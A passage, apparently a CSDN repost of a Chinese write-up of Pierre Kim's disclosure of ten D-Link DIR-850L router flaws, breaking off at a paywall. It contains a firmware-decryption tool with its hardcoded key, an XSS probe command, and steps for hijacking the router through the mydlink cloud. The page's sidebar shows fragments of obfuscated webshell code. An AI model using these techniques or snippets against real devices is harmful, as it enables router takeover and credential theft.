在一款D-Link消费级路由器上,我发现了10个严重漏洞

最新推荐文章于 2024-04-30 09:46:41 发布
最新推荐文章于 2024-04-30 09:46:41 发布
阅读量1.8w 收藏 2
点赞数 1
文章标签: php 运维 runtime
原文链接:https://yq.aliyun.com/articles/213914
版权
本文讲的是 在一款D-Link消费级路由器上,我发现了10个严重漏洞近期,信息安全研究员皮埃尔·金(Pierre·Kim)公开了D-Link DIR 850L消费级无线路由器存在的10个严重漏洞。

此次公开的D-Link漏洞涉及多方面问题,如缺乏对固件映像的适当保护机制,意味着黑客可以向目标设备注入包含后门的恶意拷贝,以及D-Link私有的mydlink云协议中的漏洞。皮埃尔·金还发现了远程代码执行漏洞、默认密钥,以及DDoS(分布式拒绝服务攻击)风险。其他风险还包括跨站脚本攻击(XSS)、明文存储密码,以及LAN后门等。

皮埃尔·金总结:“D-Link 850L是一款设计糟糕的路由器,存在大量漏洞。从LAN到WAN,所有一切都存在问题。”

一、固件映像缺乏保护

Dlink 850 LrevA的最新固件(DIR850L_REVA_FW114WWb07_h2ab_beta1.bin)不受保护,黑客可以伪造最新固件的映像。

Dlink850LrevB的最新固件映像(DIR850LB1_FW207WWb05.bin、DIR850L_REVB_FW207WWb05_h1ke_beta1.bin和DIR850LB1FW208WWb02.bin)是带有硬编码密码。

以下是一个解密的固件映像的程序:

/* 
 * Simple tool to decrypt D-LINK DIR-850L REVB firmwares 
 *
 * $ gcc -o revbdec revbdec.c
 * $ ./revbdec DIR850L_REVB_FW207WWb05_h1ke_beta1.bin wrgac25_dlink.2013gui_dir850l > DIR850L_REVB_FW207WWb05_h1ke_beta1.decrypted
 */

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define USAGE "Usage: decimg <filename> <key>\n"

int main(int    argc,
         char   **argv)
{
        int     i, fi;
        int     fo = STDOUT_FILENO, fe = STDERR_FILENO;

        if (argc != 3)
        {
                write(fe, USAGE, strlen(USAGE));
                return (EXIT_FAILURE);
        }

        if ((fi = open(argv[1], O_RDONLY)) == -1)
        {
                perror("open");
                write(fe, USAGE, strlen(USAGE));
                return (EXIT_FAILURE);
        }

        const char *key = argv[2];
        int kl = strlen(key);

        i = 0;
        while (1)
        {
                char buffer[4096];
                int j, len;
                len = read(fi, buffer, 4096);
                if (len <= 0)
                        break;
                for (j = 0; j < len; j++) {
                        buffer[j] ^= (i + j) % 0xFB + 1;
                        buffer[j] ^= key[(i + j) % kl];
                }
                write(fo, buffer, len);
                i += len;
        }

       return (EXIT_SUCCESS);
}

你可以使用这个程序来解密固件映像:

user@kali:~/petage-dlink$ ./revbdec DIR850L_REVB_FW207WWb05_h1ke_beta1.bin wrgac25_dlink.2013gui_dir850l > DIR850L_REVB_FW207WWb05_h1ke_beta1.decrypted
user@kali:~/petage-dlink$ binwalk DIR850L_REVB_FW207WWb05_h1ke_beta1.decrypted

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             DLOB firmware header, boot partition: "dev=/dev/mtdblock/1"
593           0x251           LZMA compressed data, properties: 0x88, dictionary size: 1048576 bytes, uncompressed size: 65535 bytes
10380         0x288C          LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 5184868 bytes
1704052       0x1A0074        PackImg section delimiter tag, little endian size: 10518016 bytes; big endian size: 8298496 bytes
1704084       0x1A0094        Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 8296266 bytes, 2678 inodes, blocksize: 131072 bytes, created: 2017-01-20 06:39:29

所以说,固件映像的保护是不存在的。

二、跨站脚本攻击(XSS)

只需通过分析/htdocs/web上的PHP文件,就可以发现一些易受攻击的XSS。

黑客可以使用XSS攻击,经过用户的身份验证,以便窃取身份验证cookie。

/htdocs/web/wpsacts.php:

user@kali:~/petage-dlink$ wget -qO- --post-data='action=<a>' http://ip:port/wpsacts.php
<?xml version="1.0" encoding="utf-8"?>
<wpsreport>
        <action><a></action>
        <result></result>
        <reason></reason>
</wpsreport>


user@kali:~/petage-dlink$ cat ./fs/htdocs/web/wpsacts.php
[..]
<wpsreport>
        <action><?echo $_POST["action"];?></action>
[...]

/htdocs/web/shareport.php里的XSS:

[...]
         <action><?echo $_POST["action"];?></action>
[...]

/htdocs/web/sitesurvey.php里的XSS:

[...]
        <action><?echo $_POST["action"];?></action>
[...]

/htdocs/web/wandetect.php里的XSS:

[...]
   <action><?echo $_POST["action"];?></action>
[...]

/htdocs/web/wpsacts.php里的XSS:

[...]
   <action><?echo $_POST["action"];?></action>
[...]

三、mydlink云协议中的漏洞

黑客可以使用自定义的mydlink云协议获得完整的访问权限。

http://ip_of_router/register_send.php不检查用户的身份验证,因此黑客可以滥用此网页来获得对设备的控制,此网页用于将设备注册到myDlink云基础设施。

黑客将使用未经验证的/register_send.php网页来进行:

1.创建MyDlink云帐户;

2.在设备上注册这个账号;

3.将设备添加到这个帐户,这样设备将通过管理密码进入到云平台,同时这意味着密码以明文存储。

首先,黑客将使用Firefox50访问Dlink登录页https://www.mydlink.net.cn/entrance,黑客会利用该网页远程控制设备(比如通过重新启动)。不过要注意的是,Firefox50要安装官方的DlinkNPAPI扩展。

其次,使用Firefox开发工具,黑客可以分析来自www.mydlink.com上的Dlinkapi的默认HTTP请求或响应。因为在默认情况下,Dlink云接口将在PUT请求的响应中泄漏设备的密码。仅仅通过看NPAPI插件的HTTP请求,api就可以在明文中找到设备的密码。

最后,NPAPI插件会自动建立一个路由器和Firefox浏览器之间的通道,这样,黑客就可以访问http://127.0.0.1:dynamicaly_generated_remote_port/控制远程路由器。流量将直接进入亚马逊服务器,然后到达远程Dlink路由器::

Firefox NPAPI client (http://127.0.0.1:remote_port/)   ->    Amazon   ->    Dlink 850L HTTP Interface.

黑客将使用来自Dlink api的legitHTTPS响应提供的前一个密码,并能够在路由器内登录。此时,黑客就完成了对路由器的完全控制。

这是通过在Amazon服务器上创建一个TCP通道的signalc程序(/mydlink/内部)实现的。

驻留在http://ip_of_router/register_send.php的PHP脚本,将充当黑客和远程Dlinkapi之间的代理,此页面还将检索密码(它存储在cleartext中)并将其发送到远程Dlink api。

151 $devpasswd = query("/device/account/entry/password"); <- $devpasswd contains the password
152 $action = $_POST["act"];                                 of the device

密码将在设备的关联中发送(第三个请求:adddev)到Mydlink云服务(见&device_password=$devpasswd):

178 //sign up
179 $post_str_signup = "client=wizard&wizard_version=" .$wizard_version. "&lang=" .$_POST["lang"].
180                    "&action=sign-up&accept=accept&email=" .$_POST["outemail"]. "&password=" .$_POST["passwd"].
181                    "&password_verify=" .$_POST["passwd"]. "&name_first=" .$_POST["firstname"]. "&name_last=" .$_POST["lastname"]." ";
182 
183 $post_url_signup = "/signin/";
184 
185 $action_signup = "signup";
186 
187 //sign in       
188 $post_str_signin = "client=wizard&wizard_version=" .$wizard_version. "&lang=" .$_POST["lang"].
189             "&email=" .$_POST["outemail"]. "&password=" .$_POST["passwd"]." ";
190 
191 $post_url_signin = "/account/?signin";
192 
193 $action_signin = "signin";
194 
195 //add dev (bind device)
196 $post_str_adddev = "client=wizard&wizard_version=" .$wizard_version. "&lang=" .$_POST["lang"].
197             "&dlife_no=" .$mydlink_num. "&device_password=" .$devpasswd. "&dfp=" .$dlinkfootprint." ";
198 
199 $post_url_adddev = "/account/?add";
200 
201 $action_adddev = "adddev";
202 
203 //main start
204 if($action == $action_signup)                    <---- first request
205 {
206         $post_s
最低0.47元/天 解锁文章
weixin_33989058
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
俄语网站大全
若是凉夜已成梦
03-20 24万+
俄文网站大全发表日期:2008年1月21日 已经有447位读者读过此文转帖一些俄文网站,当然不排除一些网址可能已经打不开了,朋友们可以有选择的浏览! 俄文网址 搜索引擎 语言、文学 http://www.weblist.ru 汉俄通 http://www.het.cn http://www.rambler.ru/ 俄语库 http://rucool.top
最新0day!!用友U8-Cloud UploadFile接口存在任意文件读取漏洞
weixin_43167326的博客
04-02 590
U8 cloud 聚焦成长型、创新型企业的云 ERP,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。该系统存在任何文件读取漏洞
www.zhsws.com/admin.php,WebShell/DJ团队.asp at master · xl7dev/WebShell · GitHub
weixin_36238982的博客
04-01 39万+
#@~^d24BAA==]/2Kxk+R~E6W+MPxYMEn@#@&rx,3DMWD,]n/!:PH+aO,@#@&/D.AzfxE@!/m.raY~VmUTECT+{\4kmMrwDP.ElOxk+D7nD@*J@#@&dOD~bG'dY.$zf'J&WP"+5;/YcErJ'm^rxOhlk/hKD9'JrJb@!@*JEErPK4nx,?+kdrW`rJ:...
D-Link设备远程命令执行漏洞(CVE-2024-3273)
最新发布
qq_69775412的博客
04-30 327
D-Link NAS设备nas_sharing.cgi接口存在远程命令执行漏洞
java调用阿里OCR身份识别接口
weixin_34318326的博客
04-13 14万+
前几天需要用到阿里的OCR接口,中间有踩坑,现在记录下来,已便使用 一.BASE64 OCR调用文档中需要传入BASE64,感谢Apache <dependency> <groupId>commons-codec</groupId> <artifactId>commons-codec</a...
python 函数
exusiaiZ的博客
10-15 412
Python函数的定义 定义函数,也就是创建一个函数,可以理解为创建一个具有某些用途的工具。定义函数需要用 def 关键字实现,具体的语法格式如下: def 函数名(参数列表): //实现特定功能的多行代码 [return [返回值]] 其中,用 [] 括起来的为可选择部分,即可以使用,也可以省略。 此格式中,各部分参数的含义如下: 函数名:其实就是一个符合 Python 语法的标识符,但不建议读者使用 a、b、c 这类简单的标识符作为函数名,函数名最好能够体现出该函数的功能(如上面的 m
Java加密技术(十一)——双向认证
u014386474的博客
06-14 4万+
对于双向认证,做一个简单的描述。  服务器端下发证书,客户端接受证书。证书带有公钥信息,用于验证服务器端、对数据加密/解密,起到OSI五类服务的认证(鉴别)服务和保密性服务。  这只是单向认证,为什么?因为客户端可以验证服务器端,但服务器端不能验证客户端!  如果客户端也有这样一个证书,服务器端也就能够验证客户端,这就是双向认证了!  换言之,当你用银行的“U盾”之类的U盘与银行账
浅谈D-Link系列路由器漏洞挖掘入门
10-02
本文将带你进入D-Link系列路由器漏洞挖掘的世界,让你了解如何从零开始探索路由器安全的奥秘。首先,我们来谈谈为什么要关注路由器漏洞以及如何进行准备工作。 D-Link系列路由器作为广泛使用的家用和小型企业设备,...
D-Link路由器备份路由器配置信息图文教程
10-01
在IT领域,网络设备的管理和配置是至关重要的环节,尤其是对于家用或小型企业网络环境中的D-Link路由器。本文将详细介绍如何备份D-Link路由器的配置信息,以便在需要重置或遇到问题时能快速恢复网络设置。 首先,...
D-Link 615无线路由器怎么给固件升级?
10-01
D-Link 615无线路由器怎么给固件升级?固件升级往往会给设备带来更好的使用体验,所以追求用户体验或者喜欢尝鲜的小伙伴总是把固件、系统升级到最新版。今天我来带领大家升级一下D-Link 615的固件
D-LINK路由器开启远程管理配置图文教程
10-01
主要介绍了D-LINK路由器开启远程管理配置图文教程,开启路由器的远程管理功能,可以帮助不懂的人配置一些东西,需要的朋友可以参考下
D-Link无线路由器设置 D-Link系列家用设置图文教程
10-02
D-Link DIR-605L云路由设置非常简单,就是在普通无线路由器设置的基础上增加了注册过程,即将D-Link DIR-605L路由器注册到mydilnk云端,使其成为云中的一个路由器,以实现通过Internet对其的管理
http://www.htsjpt.com/admin.php,webshell/php/xiao.php.txt at f875e7b78085777b8a10c3456478dbd192d851a...
热门推荐
weixin_39980575的博客
03-13 60万+
eval(gzuncompress(base64_decode("eJzsvfl3G8eROP6z/J7/h9GYK4AmiIP3IVDiTUq8RJA6qceHY0BABDDQAOAhW/u/MNpNvLJ2I0qkLoq6SJsUZVEUSUmOnnP4WCeO1slGzsd2rDjvW9XHTA8wACnFye7nky9tkUAf1dXV1dXV1dXViqap2rCmJFUtHU2M2Ku...
PointSIFT: A SIFT-like Network Module for 3D Point Cloud Semantic Segmentation
没有B树的博客
11-03 1148
近年来,3D语义理解研究为直接从点云中提取特征提供了新的思路1,2,这就需要对点云进行有效的形状模式描述。受出色的2D形状特征描述子SIFT的启发3,我们设计了一个名为PointSIFT的模块,该模块对不同方向的信息进行编码,并适应形状的比例。具体而言,设计了一个方向编码单元来描述八个关键方向,并通过堆叠多个方向编码单元来实现多尺度表示。PointSIFT模块可以集成到各种基于PointNet的体系结构中,以提高表示能力。大量实验表明,我们基于PointSIFT的框架在标准基准数据集上优于最先进的方法。
D-Link系列家用路由器漏洞分析总结
Hello World.c
04-27 2171
D-Link系列家用路由器漏洞分析总结 ⚡ 尚未了解清楚 ❗ 已编写好完整POC ❓ 未能编写完整POC ❌ 暂时不能实际验证 DCS-2530L CVE-2020-25078 ❗ 敏感信息泄露 D-Link DCS-1100 || DCS-1130 CVE-2017-8416 ⚡ DIR-850L cgi动态web服务器 CVE-2017-3193 ❗ 认证前栈溢出 CVE-2017-14421 ❗ 路由器后门 DIR-816 独立web服务器 CVE-2021-27114 ❓ 认证后栈溢出 CVE
web播放rtsp视频流
IT菜鸟
07-04 1万+
温馨提示:执行教程前两步(1下载、2安装)即可;6、在目录下按住 shift+鼠标右键 =》 在此处打开 Powershell 窗口。2、编辑用户变量 Path =》新建=》填写ffmpeg解压后的bin路径。1、此电脑(右键)=》属性=》高级系统设置=》环境变量。ctrl+R 输入 cmd 打开命令窗口,输入。7、输入以下命令,启动 node 服务。2、打开 cmd 命令窗口切换到目录。1、新建一个项目目录(新建文件夹)3、在命令窗口执行下面命令,安装。4、接着在目录新建一个。在浏览器打开页面查看。
css3抽奖转盘html5,HTML5抽奖转盘-CSS3超简单版本
weixin_32721919的博客
06-23 583
网上有很多关于抽奖转盘的代码和实例,有使用JavaScript控制动画的,有使用Canvas实现的,它们思路各不相同,本文将介绍一种采用CSS3的方式来实现转盘动画效果,非常简单,只需几行代码即可实现。效果演示demo地址核心思路采用CSS3的transition(过渡效果),给定需要旋转的元素设置transform的rotate属性的结束角度,同时添加transition-timing-func...
IPP希尔伯特变换
jinhualing1987的专栏
02-11 1210
在数学和信号处理中,希尔伯特变换(Hilbert transform)是一个对函数产生定义域相同的函数的线性算子。 在inter ipp 库中有实现该算法,示例如下: IppStatus hilbert(Ipp32f* pInputDat, Ipp32fc* pOutDat,int iLen) { int n; IppStatus status; IppsHilbertSp...
redis中的两个坑 一个随机性写入被拒绝 二是增减指定数值
csdn,码农
05-24 1486
1.在redis中使用脚本 调用 redis.call('time')[1] 报错如下 ERR Error running script (call to f_e745355f11745192bd45376618a34bec9145653b): @user_script:1: @user_script: 1: Write commands not allowed after non deterministic comman ds 原因与解决 Redis内嵌了Lua环境来支持用户扩展功能,但是出于数据一
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值